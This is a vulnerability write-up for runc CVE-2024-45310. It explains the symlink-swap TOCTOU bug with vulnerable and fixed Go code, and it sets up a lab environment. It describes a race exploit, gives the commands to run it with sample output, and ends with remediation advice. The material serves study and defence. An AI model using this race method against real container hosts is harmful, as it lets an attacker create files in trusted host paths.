Skip to content

CVE-2024-45310: runc symlink-race host inode creation

Published 2026-06-06

Summary

A container-side attacker can trick runc into creating an empty file or directory at any path on the host filesystem by winning a symlink-swap race inside a shared volume.

Field Value
Project runc
Affected component libcontainer/rootfs_linux.go: createMountpoint / createIfNotExists / mountCgroupV1 / mountToRootfs / createDeviceNode
Severity LOW
CVSS CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N (3.6)
CWE CWE-363, CWE-61
Affected versions < 1.1.14; >= 1.2.0-rc.1, < 1.2.0-rc.3
Fixed version v1.1.14; v1.2.0-rc.3
Advisory GHSA-jfvp-7x6p-h2pv

1. Vulnerability overview

runc is the low-level container runtime that underlies Docker, containerd, Kubernetes, and most other OCI-based container platforms. CVE-2024-45310 allows an attacker who controls the contents of a volume shared into a container to cause runc (executing as host root) to create an empty file or empty directory at any path on the host filesystem. The attacker cannot read existing files, overwrite them, or write data; only new, empty inodes can be created. That constraint limits the impact, but the primitive is still useful: an attacker could pre-create files that a privileged process later opens for writing, inject entries into directories that programs treat as trusted (e.g. /etc/cron.d), or interfere with existence-check logic.

Root cause

The bug is a time-of-check/time-of-use (TOCTOU) race in how runc prepares mount destinations inside a container rootfs. In libcontainer/rootfs_linux.go (and several helper functions it calls), runc computes the absolute host path for a bind-mount target by calling securejoin.SecureJoin(rootfs, m.Destination). SecureJoin resolves all symlinks at the moment it is called and returns a plain string. runc then passes that string to os.MkdirAll, a second, separate call that does its own path traversal from scratch:

// BEFORE (vulnerable)
dest, err := securejoin.SecureJoin(rootfs, m.Destination) // returns a string
// ...
if err := os.MkdirAll(dest, 0o755); err != nil {           // no longer safe — symlink race here
    return err
}

Between those two calls there is a window. If an attacker controls a directory component along the resolved path (for example, because it sits inside a world-writable volume shared into the container), they can replace it with a symlink to an arbitrary host path in that window. When os.MkdirAll runs, it follows the symlink and creates the target directory on the host rather than inside the rootfs.

The fix, introduced in runc v1.1.14 and v1.2.0-rc.3 (patch commits 63c2908, 8781993, f0b652e), replaces every call to os.MkdirAll on a rootfs-relative path with a new function utils.MkdirAllInRoot(root, unsafePath, mode):

// AFTER (fixed) — representative call site
if err := utils.MkdirAllInRoot(rootfs, dest, 0o755); err != nil {
    return err
}

MkdirAllInRoot opens the root directory as a file descriptor and walks each path component using openat(O_NOFOLLOW) combined with mkdirat. Because every step is anchored to a real file descriptor rather than a string, a symlink swap mid-walk causes openat to return ENOTDIR instead of silently following the link out of the rootfs. For regular file creation (bind-mount target stubs), the analogous fix replaces os.OpenFile with unix.Mknodat, which similarly does not follow a trailing symlink.


2. Vulnerable environment

The environment runs a single privileged Linux container (ubuntu:22.04) as the inner "host": the machine on which runc is installed and runs. runc v1.1.13 (the last vulnerable release) is installed from its official release binary, with its SHA256 verified at build time. Nested containers are launched by runc inside this inner host; the CVE causes inodes to appear on the inner host's own filesystem, outside any nested container rootfs.

The environment files are available for download:

Layout inside the inner host

Path Purpose
/usr/local/sbin/runc Vulnerable runc 1.1.13 binary
/opt/oci-rootfs BusyBox rootfs; copied per OCI bundle
/srv/share-backing World-writable (mode 0777) shared volume backing; the attacker's race surface
/host-target The exploit target directory on the host, outside both the shared volume and any nested container rootfs; empty at clean baseline

Standing up the environment

docker compose -f env/docker-compose.yml up -d --wait

Verify the environment is in the expected state:

docker compose -f env/docker-compose.yml ps --format '{{.Name}} {{.Status}}'
docker exec cve-2024-45310-innerhost /usr/local/sbin/runc --version | head -n1
# Expected: runc version 1.1.13

docker exec cve-2024-45310-innerhost sh -c \
  'test -d /host-target && [ -z "$(ls -A /host-target)" ] && echo "host-target clean"; ls -ld /srv/share-backing'
# Expected: "host-target clean" and drwxrwxrwx on /srv/share-backing

The container's entrypoint.sh empties /host-target on every start, so restarting the container restores a clean baseline:

docker compose -f env/docker-compose.yml restart innerhost

3. How to exploit

The exploit is a two-part shell script: exploit/run.sh (outer driver, run on the host) and exploit/inner.sh (race engine, injected into the inner-host container). The files are available as:

How the race works

inner.sh does three things concurrently inside the inner-host container:

  1. Bundle builder: assembles a minimal OCI bundle (config.json) whose second bind-mount specifies a destination of /share/target/gift, where /share is a bind of the attacker-controlled /srv/share-backing.
  2. Background swapper: runs a tight loop alternating /srv/share-backing/target between a real directory and a symlink pointing to /host-target. This is the race bait.
  3. Foreground launcher: repeatedly calls runc run and runc delete against the bundle. Each invocation drives runc's createMountpointsecurejoin.SecureJoinos.MkdirAll on the resolved string path.

When the swapper wins the race (when the symlink is in place at the exact moment os.MkdirAll traverses the path), runc follows the symlink and creates /host-target/gift on the host rather than inside the bundle rootfs.

Steps

Step 1: Confirm clean baseline

docker exec cve-2024-45310-innerhost stat -c '%n %U:%G %F' /host-target/gift
# Expected: stat: cannot statx '/host-target/gift': No such file or directory

Step 2: Run the exploit

bash exploit/run.sh cve-2024-45310-innerhost /srv/share-backing /host-target gift 6000
Argument Value used Meaning
CONTAINER cve-2024-45310-innerhost Inner-host container name
SHARE /srv/share-backing World-writable race surface inside the container
HOST_TARGET /host-target Target directory outside rootfs and share backing
LEAF gift Leaf directory name the bind-mount destination creates
ITERS 6000 Maximum runc run iterations before giving up

The script exits as soon as /host-target/gift appears. In the verified run it completed at iteration 614 in under 5 seconds. Typical output:

WON race at iteration 614: /host-target/gift created
iterations=614
total 12
drwxr-xr-x 3 root root 4096 ... .
drwxr-xr-x 1 root root 4096 ... ..
drwxr-xr-x 2 root root 4096 ... gift

Step 3: Verify through the independent observation channel

The script's stdout is not the authoritative proof. The exploit does not write directly to /host-target; only runc (as host root) can. The authoritative check is a privileged host-side stat, performed from outside the exploit:

docker exec cve-2024-45310-innerhost stat -c '%n %U:%G %F' /host-target/gift

Observed output from the verified run:

/host-target/gift root:root directory

This confirms all three required conditions:

  1. Existence, absent at baseline: /host-target/gift was No such file or directory before the exploit ran.
  2. Owner is host-root: root:root proves runc created the inode (not the unprivileged attacker); the attacker has no write route to /host-target outside of runc.
  3. Outside rootfs and outside shared volume: the inode number 33687783 is distinct from /srv/share-backing/target (inode 33687784), and the path sits under /host-target, a sibling of both /srv/share-backing and /opt/oci-rootfs.

Additional inode-distinctness check from the verified run:

stat -c '%i %n' /host-target/gift          → 33687783 /host-target/gift
stat -c '%i %n' /srv/share-backing/target  → 33687784 /srv/share-backing/target

Environment teardown

docker compose -f env/docker-compose.yml down -v

The created inode lives only on the inner-host container's filesystem. A docker compose restart or down -v removes it entirely; there are no side effects on the outer host.


4. Security advice

Remediation

Upgrade runc to v1.1.14 (stable) or v1.2.0-rc.3 (release candidate). Both releases replace every bare os.MkdirAll call on rootfs-relative paths with utils.MkdirAllInRoot, which uses openat(O_NOFOLLOW) and mkdirat to walk the path without ever releasing the file-descriptor anchor, closing the symlink-substitution window entirely.

Container runtimes that bundle their own runc (Docker Engine, containerd, CRI-O) should be updated to versions that ship runc ≥ 1.1.14.

Mitigations and workarounds

If an immediate upgrade is not possible:

  • Avoid untrusted shared volumes. The attack requires an attacker-controlled path component inside a world-writable directory that is also bind-mounted into a container as a volume. Restricting which directories can be shared as volumes, and ensuring shared volumes are not world-writable, significantly raises the bar.
  • Rootless runc / user-namespace containers. Since the exploit works by causing runc (running as root) to create inodes on the host, running containers in rootless mode (where runc runs as an unprivileged user) limits the blast radius to paths writable by that user.
  • The vulnerability was publicly disclosed without embargo on 2024-09-03, given its low CVSS 3.1 score of 3.6. No weaponised public PoC was circulating at the time of disclosure.

References